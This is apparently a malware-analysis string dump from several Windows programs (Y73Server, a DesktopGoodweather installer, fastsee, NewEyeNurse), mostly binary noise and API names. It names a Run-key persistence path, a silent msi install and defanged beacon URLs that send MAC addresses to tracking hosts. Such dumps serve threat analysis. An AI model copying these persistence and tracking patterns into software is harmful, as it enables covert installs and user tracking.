9 9$9(9,90949897-7W7}78'8 8;8[8:(;,;0;|;=%>)>->1>8>8>?3?;???\?6t7s72!2)2-2423 4-434;4@4}46/737771!1)1-1519&:*:.:2:6:<:>9!9;9|9{8"8&8*8.828681 1$1(1,101418153686[6`69#:):.:3:8::#;1;@;_;9 9$9(9,9094989? ?$?(?,?0?4?8?@?\?|?3"4&4*4.424844]5{5;#;(;:;>;: :$:(:,:0:4:8:<:>8 8$8(8,8stdole2.tlbWWW:WebShellmUrlsWWWShowWebFormWTaUrlurlWlicourlWW-ShowUrlWOpenUrlWD]gameurlW3333333333333333333333383333333393333333333333338:*"*"$33383333333333333333333333333333333833338?383333333333333:*3:"$3338333333333333333ZtK.oJb)"%S'TeIKWindows9uTthreadMobileCmd?HTTPApp>WebConstWLFtp0IdHTTPHeaderInfoIdTCPServer7USimpleUdpClientuMsgFilterUHttpWaitServerGuHttpDownProgeresslfrmLoginTipsFont.CharsetFont.ColorFont.HeightFont.NameFont.StylePNGImage.DataiTXtXML:com.adobe.xmp" id="W5M0MpCehiHzreSzNTczkc9d"?>KeyPreviewOnKeyPressPicture.Data6z%ug%uI"Q?siTXtXML:com.adobe.xmp" id="W5M0MpCehiHzreSzNTczkc9d"?> 3." id="W5M0MpCehiHzreSzNTczkc9d"?> egFormLoginTips" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?> $)[A%uDialogBoxes.DisableAllPrintOptions.Margins.LeftPrintOptions.Margins.RightPrintOptions.Margins.TopPrintOptions.Margins.BottomPrintOptions.HeaderPrintOptions.HTMLHeader.StringsPrintOptions.FooterPrintOptions.Orientation" id="W5M0MpCehiHzreSzNTczkc9d"?>%.fEConstraints.MinHeightConstraints.MinWidth" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?>.rVxu%dsUVpVU`%dY`.VlqQ8m%X%Z@%x:K6I1.Ix\]Ko" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?> BV" id="W5M0MpCehiHzreSzNTczkc9d"?> J" id="W5M0MpCehiHzreSzNTczkc9d"?> &V" id="W5M0MpCehiHzreSzNTczkc9d"?> T" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?>kiTXtXML:com.adobe.xmp" id="W5M0MpCehiHzreSzNTczkc9d"?> ^yq%SEix>" id="W5M0MpCehiHzreSzNTczkc9d"?>!.iHKFormWebShowDisableErrors.fpExceptionsBtnImage.DataBgPic.Data" id="W5M0MpCehiHzreSzNTczkc9d"?>HTMLCode.StringsPicBackground.DataIEC hXXp://VVV.iec.ch.IEC 61966-2.1 Default RGB colour space - sRGBCRT curvPicBtnClose.DataPicBtnExpand.DataFormWebShowOnly" id="W5M0MpCehiHzreSzNTczkc9d"?> hJ" id="W5M0MpCehiHzreSzNTczkc9d"?>}G.ld" id="W5M0MpCehiHzreSzNTczkc9d"?> R" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?> f!C" id="W5M0MpCehiHzreSzNTczkc9d"?> y1PicBtnLeft.DataPicBtnRight.DataTabPic.DataScrollLeftPic.DataScrollRightPic.DataCloseBtnPic.DataMenuBtnPic.DataNewBtnPic.Data" id="W5M0MpCehiHzreSzNTczkc9d"?>edtSearchKeyPress" id="W5M0MpCehiHzreSzNTczkc9d"?> i" id="W5M0MpCehiHzreSzNTczkc9d"?> a" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?>\.wm|||_" id="W5M0MpCehiHzreSzNTczkc9d"?>BGPic.DataPicUp.DataPicDown.DataPicBG.DataPicThumb.Data" id="W5M0MpCehiHzreSzNTczkc9d"?> m=z" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?> _RK$.up%Dn3:@Mh?.MeyHV.He" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?> H" id="W5M0MpCehiHzreSzNTczkc9d"?>.uHT&" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?> tCr" id="W5M0MpCehiHzreSzNTczkc9d"?> )" id="W5M0MpCehiHzreSzNTczkc9d"?>" id="W5M0MpCehiHzreSzNTczkc9d"?> =&" id="W5M0MpCehiHzreSzNTczkc9d"?>Act_Loginversion="11.0.2902.10471"name="Microsoft.Windows.Common-Controls"version="6.0.0.0"publicKeyToken="6595b64144ccf1df"errorUrl{surl}updateUrlLocalExehXXp://web.fx.sushouspell.com/left/left.htmlhXXp://web.fx.sushouspell.com/left/buttom.htmlloginurliconurladvurlkeywordTFORMLOGINTIPSTFORMWEBSHOWTFORMWEBSHOWONLY,Unsupported Application Extension block sizeUnknown GIF block type'Object type not supported for operationUnsupported PixelFormatInvalid stream operationInvalid extension introducerúiled to allocate memory for GIF DIBUnsupported Media TypeHTTP version not supportedUnknown Protocol(Request method requires HTTP version 1.1 Header has already been written.Error in parsing command.!Unsupported authorization scheme.6Cannot change session state when the server is active.DThis authentication method is already registered with class name %s.Object type not supported.Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.Reply Code is not valid: %s Thread must be specified for the scheduler.7Cannot change the scheduler while the server is Active.Command not supported.Address type not supported."%d: Circular links are not allowedFile "%s" not foundNot Connected$Can not bind in port range (%d - %d)Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.Invalid Port Range (%d - %d)%s is not a valid service.%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.Set Size Exceeded.)UDP is not support in this SOCKS version.Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.Protocol not supported.Socket type not supported."Operation not supported on socket.Protocol family not supported.0Address family not supported by protocol family.Socket Error # %dOperation would block.Operation now in progress.Operation already in progress.Socket operation on non-socket.Destination address required.*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Error decoding URL style (%%XX) encoded string at position ÑInvalid URL encoded character (%s) at position %d&Cannot change the size of a JPEG imageJPEG error #%dError4Failed attempting to retrieve time zone information.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)Resolving hostname %s.Connecting to %s."%s" is an invalid pathUTF-7Ênnot remove shell notification iconÊnnot create shell notification icon"%s requires Windows Vista or laterOLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parametersInvalid clipboard format Clipboard does not support IconsCannot open clipboard/Menu '%s' is already being used by another form- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.Invalid input value7Invalid input value. Use escape key to abandon changesError creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'No help found for %s#No context-sensitive help installedScan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic$Unknown picture file extension (.%s)Unsupported clipboard formatError reading %s%s%s: %sFailed to create key %sFailed to get data for '%s'Failed to set data for '%s'Resource %s not found%s.Seek not implemented$Operation not allowed on sorted list Too many rows or columns deleted$%s not in a class registration groupProperty %s does not existThread creation error: %sThread Error: %s (%d)Cannot create file "%s". %s1Fixed column count must be less than column count Fixed row count must be less than row countCannot open file "%s". %sGrid too large for operationUnable to write to %sInvalid stream format$''%s'' is not a valid component nameInvalid data type for '%s' List capacity out of bounds (%d)List count out of bounds (%d)List index out of bounds (%d)Ancestor for '%s' not foundCannot assign a %s to a %sBits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main threadClass %s not foundA class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates=Overflow while converting variant of type (%s) into type (%s)Operation not supportedExternal exception %xInterface not supported%s (%s, line %d)Abstract Error?Access violation at address %p in module '%s'. %s of address %pSystem Error. Code: %d.(Exception %s in module %s at %p.Application Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'"Variant method calls not supportedInvalid variant operationInvalid NULL variant operation%Invalid variant operation (%s%.8x)%s5Could not convert variant of type (%s) into type (%s)Integer overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pOperation aborted!'%s' is not a valid integer value('%s' is not a valid floating point value'%s' is not a valid date'%s' is not a valid time!'%s' is not a valid date and time'%s' is not a valid GUID valueI/O error %d1.0.1011.19351.0.0.0Y73Server.exe_2208:.text`.rdata@.data.rsrc@.relocFtPQ8Shl%DShX%DCNotSupportedExceptionSoftware\Microsoft\Windows\CurrentVersion\Policies\ExplorerSoftware\Microsoft\Windows\CurrentVersion\Policies\NetworkSoftware\Microsoft\Windows\CurrentVersion\Policies\Comdlg32ntdll.dllkernel32.dll%s%s.dllf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cppCHttpFilehXXp://WININET.DLLCCmdTargethhctrl.ocxf:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inlAfx:%p:%x:%p:%p:%pAfx:%p:%xcommctrl_DragListMsgcomctl32.dllcomdlg32.dllshell32.dllf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cppf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cppmfcm90.dllf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cppf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cppf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cppf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cppole32.dlluser32.dllf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cppPlease contact the application's support team for more information.- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedoperatorGetProcessWindowStationUSER32.DLLOLEACC.dllsetting.ini{F62B083E-1C42-47b6-98CE-660DA67AA3D4}SOFTWARE\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Uninstall\Y73hXXp://tja.Y73.com:82/do1.php?cid=%d-%d&mac=%s&k=%d%Program Files%\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl%s (%s:%d)so.y73.comhXXp://%s:73/C:\Projects\Y73\Release\Y73Server.pdbIPHLPAPI.DLLGetCPInfoGetConsoleOutputCPKERNEL32.dllCreateDialogIndirectParamAGetKeyStateSetWindowsHookExAUnhookWindowsHookExUSER32.dllGetViewportExtExSetViewportOrgExOffsetViewportOrgExSetViewportExtExScaleViewportExtExGDI32.dllCOMDLG32.dllWINSPOOL.DRVRegCloseKeyRegOpenKeyExARegCreateKeyExARegDeleteKeyARegEnumKeyARegOpenKeyAADVAPI32.dllSHELL32.dllCOMCTL32.dllUrlUnescapeASHLWAPI.dlloledlg.dllOLEAUT32.dllWS2_32.dllInternetCrackUrlAInternetCanonicalizeUrlAInternetOpenUrlAWININET.dll.PAVCOleException@@.PAVCObject@@.PAVCMemoryException@@.PAVCSimpleException@@.PAVCNotSupportedException@@.PAVCInvalidArgException@@.?AVCNotSupportedException@@.PAVCResourceException@@.PAVCUserException@@.?AVCHttpFile@@.?AVCCmdUI@@.?AVCTestCmdUI@@.PAVCArchiveException@@.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@.PAVCFileException@@.PAVCOleDispatchException@@zcÁ.?AVCCmdTarget@@.PAVCInternetException@@.PAVCException@@%Program Files%\Y73\Y73Server.exehXXp://61.196.186.155:73/\setting.ini0 0&0,020=1`11 222>2`2;\1%1*1@3}3>'>,>0>4>]>6l61 1$1(1,101|1accKeyboardShortcutekernel32.dllmscoree.dllKERNEL32.DLL6.0.0.0Y73Server.exe(*.*)copy%original file name%.exe_896_rwx_005BD000_00003000:lstrcmpiALoadLibraryALocalFreeLocalAllocGetACPSleepVirtualFreeVirtualAllocGetSystemInfoGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdVirtualQueryWideCharToMultiByteMultiByteToWideCharlstrlenWlstrcpynWLoadLibraryExWIsValidLocaleGetSystemDefaultUILanguageGetStartupInfoAGetProcAddressGetModuleHandleWGetModuleFileNameWGetUserDefaultUILanguageGetLocaleInfoWGetLastErrorGetCommandLineWFreeLibraryFindFirstFileWFindCloseExitProcessExitThreadCreateThreadCompareStringWWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionCloseHandleRegQueryValueExWRegOpenKeyExWRegCloseKeyLoadStringWMessageBoxACharNextWSysFreeStringSysReAllocStringLenSysAllocStringLenTlsSetValueTlsGetValueLocalAllocGetModuleHandleWCreateWindowExWWindowFromPointWaitMessageUpdateWindowUnregisterClassWUnhookWindowsHookExTranslateMessageTranslateMDISysAccelTrackPopupMenuSystemParametersInfoWShowWindowShowScrollBarShowOwnedPopupsSetWindowsHookExWSetWindowTextWSetWindowPosSetWindowPlacementSetWindowLongWSetTimerSetScrollRangeSetScrollPosSetScrollInfoSetRectSetPropWSetParentSetMenuItemInfoWSetMenuSetForegroundWindowSetFocusSetCursorPosSetCursorSetClassLongWSetCaptureSetActiveWindowSendMessageASendMessageWScrollWindowScreenToClientRemovePropWRemoveMenuReleaseDCReleaseCaptureRegisterWindowMessageWRegisterClipboardFormatWRegisterClassWRedrawWindowPtInRectPostQuitMessagePostMessageWPeekMessageAPeekMessageWOffsetRectMsgWaitForMultipleObjectsExMsgWaitForMultipleObjectsMessageBoxWMapWindowPointsMapVirtualKeyWLoadStringWLoadKeyboardLayoutWLoadIconWLoadCursorWLoadBitmapWKillTimerIsZoomedIsWindowVisibleIsWindowUnicodeIsWindowEnabledIsWindowIsIconicIsDialogMessageAIsDialogMessageWIsChildInvalidateRectIntersectRectInsertMenuItemWInsertMenuWInflateRectGetWindowThreadProcessIdGetWindowTextWGetWindowRectGetWindowPlacementGetWindowLongWGetWindowDCGetTopWindowGetSystemMetricsGetSystemMenuGetSysColorBrushGetSysColorGetSubMenuGetScrollRangeGetScrollPosGetScrollInfoGetPropWGetParentGetWindowGetMessageTimeGetMessagePosGetMessageExtraInfoGetMenuStringWGetMenuStateGetMenuItemInfoWGetMenuItemIDGetMenuItemCountGetMenuGetLastActivePopupGetKeyboardStateGetKeyboardLayoutNameWGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextWGetIconInfoGetForegroundWindowGetFocusGetDesktopWindowGetDCExGetDCGetCursorPosGetCursorGetClipboardDataGetClientRectGetClassLongWGetClassInfoWGetCaptureGetActiveWindowFrameRectFindWindowExWFindWindowWFillRectEnumWindowsEnumThreadWindowsEnumChildWindowsEndPaintEnableWindowEnableScrollBarEnableMenuItemDrawTextExWDrawTextWDrawMenuBarDrawIconExDrawIconDrawFrameControlDrawFocusRectDrawEdgeDispatchMessageADispatchMessageWDestroyWindowDestroyMenuDestroyIconDestroyCursorDeleteMenuDefWindowProcWDefMDIChildProcWDefFrameProcWCreatePopupMenuCreateMenuCreateIconCreateAcceleratorTableWCopyIconClientToScreenCheckMenuItemCharUpperBuffWCharNextWCharLowerBuffWCharLowerWCallWindowProcWCallNextHookExBeginPaintAdjustWindowRectExActivateKeyboardLayoutAlphaBlendUnrealizeObjectStretchDIBitsStretchBltStartPageStartDocWSetWindowOrgExSetWinMetaFileBitsSetViewportOrgExSetTextColorSetStretchBltModeSetROP2SetPixelSetMapModeSetEnhMetaFileBitsSetDIBitsSetDIBColorTableSetBrushOrgExSetBkModeSetBkColorSetAbortProcSelectPaletteSelectObjectSaveDCRoundRectRestoreDCResizePaletteRectangleRectVisibleRealizePalettePolylinePolygonPolyBezierToPolyBezierPlayEnhMetaFilePiePatBltMoveToExMaskBltLineToLPtoDPIntersectClipRectGetWindowOrgExGetWinMetaFileBitsGetTextMetricsWGetTextExtentPoint32WGetSystemPaletteEntriesGetStockObjectGetRgnBoxGetPixelGetPaletteEntriesGetObjectWGetNearestPaletteIndexGetEnhMetaFilePaletteEntriesGetEnhMetaFileHeaderGetEnhMetaFileDescriptionWGetEnhMetaFileBitsGetDeviceCapsGetDIBitsGetDIBColorTableGetDCOrgExGetCurrentPositionExGetClipBoxGetBrushOrgExGetBitmapBitsGdiFlushFrameRgnExtTextOutWExtFloodFillExcludeClipRectEnumFontsWEnumFontFamiliesExWEndPageEndDocEllipseDeleteObjectDeleteEnhMetaFileDeleteDCCreateSolidBrushCreateRectRgnCreatePenIndirectCreatePaletteCreateICWCreateHalftonePaletteCreateFontIndirectWCreateEnhMetaFileWCreateDIBitmapCreateDIBSectionCreateDCWCreateCompatibleDCCreateCompatibleBitmapCreateBrushIndirectCreateBitmapCopyEnhMetaFileWCloseEnhMetaFileChordBitBltArcAbortDocVerQueryValueWGetFileVersionInfoSizeWGetFileVersionInfoWlstrcpyWWritePrivateProfileStringWWriteFileWideCharToMultiByteWaitForSingleObjectWaitForMultipleObjectsExVirtualQueryExVirtualQueryVirtualFreeVirtualAllocTryEnterCriticalSectionSwitchToThreadSuspendThreadSleepSizeofResourceSignalObjectAndWaitSetThreadPrioritySetThreadLocaleSetLastErrorSetFilePointerSetFileAttributesWSetEventSetErrorModeSetEndOfFileResumeThreadResetEventReadFileReadDirectoryChangesWRaiseExceptionQueryPerformanceFrequencyQueryPerformanceCounterPostQueuedCompletionStatusIsDebuggerPresentMultiByteToWideCharMulDivMoveFileWLockResourceLoadResourceLoadLibraryWLeaveCriticalSectionInitializeCriticalSectionGlobalUnlockGlobalSizeGlobalLockGlobalFreeGlobalFindAtomWGlobalDeleteAtomGlobalAllocGlobalAddAtomWGetVersionExWGetVersionGetUserDefaultLCIDGetTimeZoneInformationGetTickCountGetThreadPriorityGetThreadLocaleGetTempPathWGetStdHandleGetQueuedCompletionStatusGetProcAddressGetPrivateProfileStringWGetModuleHandleWGetModuleFileNameWGetLocaleInfoWGetLocalTimeGetLastErrorGetFullPathNameWGetFileSizeGetFileAttributesWGetExitCodeThreadGetExitCodeProcessGetDiskFreeSpaceWGetDateFormatWGetCurrentThreadIdGetCurrentThreadGetCurrentProcessIdGetCurrentProcessGetComputerNameWGetCPInfoFreeResourceInterlockedExchangeAddInterlockedExchangeInterlockedCompareExchangeFreeLibraryFormatMessageWFindResourceWFindNextFileWFindFirstFileWFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeExitProcessEnumCalendarInfoWEnterCriticalSectionDeleteFileWDeleteCriticalSectionCreateThreadCreateProcessWCreateIoCompletionPortCreateFileWCreateEventWCopyFileWCompareStringWCloseHandleRegUnLoadKeyWRegSetValueExWRegSaveKeyWRegRestoreKeyWRegReplaceKeyWRegQueryValueExWRegQueryInfoKeyWRegOpenKeyExWRegLoadKeyWRegFlushKeyRegEnumValueWRegEnumKeyExWRegDeleteValueWRegDeleteKeyWRegCreateKeyExWRegConnectRegistryWRegCloseKeyGetErrorInfoGetActiveObjectSysFreeStringCreateStreamOnHGlobalOleRegEnumVerbsIsAcceleratorOleDrawOleSetMenuDescriptorOleUninitializeOleInitializeCoTaskMemFreeProgIDFromCLSIDStringFromCLSIDCoCreateInstanceCoGetClassObjectCoUninitializeCoInitializeIsEqualGUIDInitializeFlatSBFlatSB_SetScrollPropFlatSB_SetScrollPosFlatSB_SetScrollInfoFlatSB_GetScrollPosFlatSB_GetScrollInfo_TrackMouseEventImageList_GetImageInfoImageList_SetIconSizeImageList_GetIconSizeImageList_WriteImageList_ReadImageList_GetDragImageImageList_DragShowNolockImageList_DragMoveImageList_DragLeaveImageList_DragEnterImageList_EndDragImageList_BeginDragImageList_CopyImageList_LoadImageWImageList_GetIconImageList_RemoveImageList_DrawExImageList_ReplaceImageList_DrawImageList_SetOverlayImageImageList_GetBkColorImageList_SetBkColorImageList_ReplaceIconImageList_AddImageList_SetImageCountImageList_GetImageCountImageList_DestroyImageList_CreateSleepIsEqualGUIDSafeArrayPtrOfIndexSafeArrayGetUBoundSafeArrayGetLBoundSafeArrayCreateVariantChangeTypeVariantCopyVariantClearVariantInitShellExecuteWSHGetSpecialFolderLocationSHGetPathFromIDListWOpenPrinterWEnumPrintersWDocumentPropertiesWClosePrinterGetDefaultPrinterWNetbioscopy%original file name%.exe_896_rwx_005C5000_00001000:KERNEL32.DLLadvapi32.dlluser32.dlloleaut32.dllkernel32.dllmsimg32.dllgdi32.dllversion.dllole32.dllcomctl32.dllshell32.dllwinspool.drvnetapi32.dllRegUnLoadKeyWShellExecuteWY73Server.exe_2208_rwx_00D38000_00001000:C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%Program Files%\Y73\setting.ini069.exe_2820:.text`.rdata@.data.ndata.rsrcuDSSh.DEFAULT\Control Panel\InternationalSoftware\Microsoft\Windows\CurrentVersionGetWindowsDirectoryAKERNEL32.dllExitWindowsExUSER32.dllGDI32.dllSHFileOperationAShellExecuteASHELL32.dllRegEnumKeyARegCreateKeyExARegCloseKeyRegDeleteKeyARegOpenKeyExAADVAPI32.dllCOMCTL32.dllole32.dllVERSION.dllverifying installer: %d%%hXXp://nsis.sf.net/NSIS_Error... %d%%~nsu.tmp%u.%u%s%sRegDeleteKeyExA%s=%s*?|/":OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst14.tmp\inetc.dllC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst14.tmp\inetc.dllC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst14.tmp\54.msiC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst14.tmp54.msi%ctSNI.relocSShL0PeekNamedPipeCreatePipensExec.dll99|9: :0:5:>:kernel32.dllT8%Program Files%\DesktopGoodweather\gpmc1.cabgpmc1.cabt14.tmp\54.msi" /qLS~1\Temp\nst14.tmp\54.msiDesktopGoodweather 1.0.0.4\"%CurrentUserName%"\LOCALS~1\Temp\nst14.tmp69.execopy%original file name%.exed:\069.exe8049d35af11e6f9c0ac670932.exec:\copy%original file name%.exe%Program Files%\DesktopGoodweather069.exeCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd13.tmpC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Nullsoft Install System v2.461.0.0.4DesktopGoodweather 1.0.0.4069.exe_2820_rwx_003A4000_00001000:callback%ddeployPkg.exe_2488:.text`.rdata@.data.rsrc@.relocappmaindll.119.dllHTTP/1.1HTTP/1.0GET %s HTTP/1.1Host: %s%sUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)GetProcessHeapKERNEL32.dllUSER32.dllCOMDLG32.dllRegCreateKeyExWRegCloseKeyRegOpenKeyExWADVAPI32.dllShellExecuteWSHELL32.dllole32.dllImagePlugin.dllMSVCP120.dllSHLWAPI.dll?messageMap@WindowImplBase@DUILIB@@1UDUI_MSGMAP@2@B?OnKeyDown@WindowImplBase@DUILIB@@UAEJIIJAAH@Zui.dlllibviewe.dllIPHLPAPI.DLLd3d9.dllInternetOpenUrlWWININET.dllWS2_32.dllMSVCR120.dll_crt_debugger_hook__crtUnhandledException__crtTerminateProcess_calloc_crt__crtGetShowWindowMode_amsg_exit_wcmdln__crtSetUnhandledExceptionFilterSETUPAPI.dll1111#1111111##11config.xmlimages/AdWindowClose.bmpsimages/ms_logo.png}Vimages/ms_sysbutton.png}Wimages/ms_title.png}M"Mc!.IpGimages/AdWindowClose.bmpimages/ms_logo.pngimages/ms_sysbutton.pngimages/ms_title.pngfilecache.inisoft_installinfo.iniadvapi32.dllhXXp://tj-fastsee.woyoo.com:8800/zxtj.ashx?uid=%d&type=1&adid=17&mac=%s&rnd=%d
X-X-X-X-X-X
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
Kernel32.dll
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
Shell32.dll
loadjc %s
hXXp://config-fastsee.woyoo.com:8800/fastsee/1.0.2.8/version.ini
port
url%d
kic.disk
mzd.live
kb.mdisk
l%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
m:_%s_b:_%s_mc:_%s_du:%d_u911o9_%s_ _8kojxf
tj3.ashx?d=
fastsese_REPORT_%d_%d
res.zip
shadow.xml
main.xml
menu.xml
(*.bmp;*.jpg;*.png;*.gif;*.ico)
*.bmp;*.jpg;*.png;*.gif;*.ico
explorer.exe
%Documents and Settings%\All Users\Application Data\fastsee_Data\filecache.ini
1.0.2.8NewEyeNurse.exe_3868:
.text
`.data
.rsrc
MSVBVM60.DLL
passwordBox
vb6chs.dll
msgtrans
GdiplusShutdown
GdipSetSmoothingLoginMode
gdi32.dll
user32.dll
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
bkEyeConnectState
shell32.dll
ShellExecuteA
newEyeFun.dll
skins\newEyePro.dll
user32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
VBA6.DLL
SHFileOperationA
lMsg
DÖDDD
D*\AC:\Users\ThinkPad\Desktop\GEyeGuard.1315\main\NewEyeNurse.vbp
loc_5845E891>bkEyeState=
2055706461746572
skins\bg.png
skins\close.png
skins\min.png
skins\bt_hui_03.png
skins\bt_lv_03.png
skins\bt_lv_05.png
skins\bt_hui_07.png
skins\bt_lv_07.png
skins\bt_lv_09.png
skins\text_12.png
skins\text_13.png
skins\text_14.png
skins\jiancha.png
skins\text_15.png
skins\bt_hui_05.png
skins\sure.png
skins\cancel.png
7570647271
skins\yb.jpg
7570646964
skins\close_j.png
skins\ts_bg.png
skins\xiuxi.png
skins\zan.png
skins\xx_bg.png
skins\300x250.jpg
skins\zjm_12.png
skins\black_10.png
HookMsg>
UnhookMsg>
.wServicePackMajor:
.wServicePackMinor:
.wSuiteMask:
.wProductType:
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Windows 2000 Data center
Windows 2000 Advanced
Windows 2000
Windows XP Professional
Windows XP Home
Windows XP
Windows Server 2003 Enterprise
Windows Server 2003 Data center
Windows Server 2003 Web Edition
Windows Server 2003 Standard
Windows Server 2003
Windows Vista
Windows Server 2008
Microsoft Windows 7
Windows Server 2008 R2
Microsoft Windows 8
ilvcnewpref>cancel-sChromeCfgisNull
last_chrome_version
loc_004520FB>open-key-Fail>
A*\AC:\Users\ThinkPad\Desktop\GEyeGuard.1315\main\NewEyeNurse.vbp
i90ba.com
1.03.1315
NewEyeNurse.exe
3e3t3>